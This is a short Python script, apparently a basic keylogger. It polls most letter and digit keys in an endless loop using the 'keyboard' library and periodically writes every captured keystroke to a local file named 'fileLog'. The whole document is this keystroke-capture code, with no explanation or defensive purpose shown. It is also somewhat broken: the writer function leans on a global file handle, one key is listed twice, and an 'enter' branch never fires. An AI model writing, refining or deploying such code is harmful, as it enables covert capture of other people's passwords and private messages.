import time
import keyboard
inputs = ['q','w','e','r','t','y','u','i','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','space','1','2','3','4','5','6','7','8','9','0','backspace']
log = []
file = 'fileLog'
def ListWrite():
	files.write('')
	with open(file,'a'):
		for j in log:
			if j =='enter':
				files.write('\n')
			else:
				files.write(j)
pressis = 0
while True:	
	i = 0
	for i in inputs:
		if keyboard.is_pressed(i):
			pressis = pressis + 1
			log.append(i)
			time.sleep(0.1)
	if pressis > 50:
		with open(file,'w') as files:
			ListWrite()
		pressis = 0
	time.sleep(0.05)
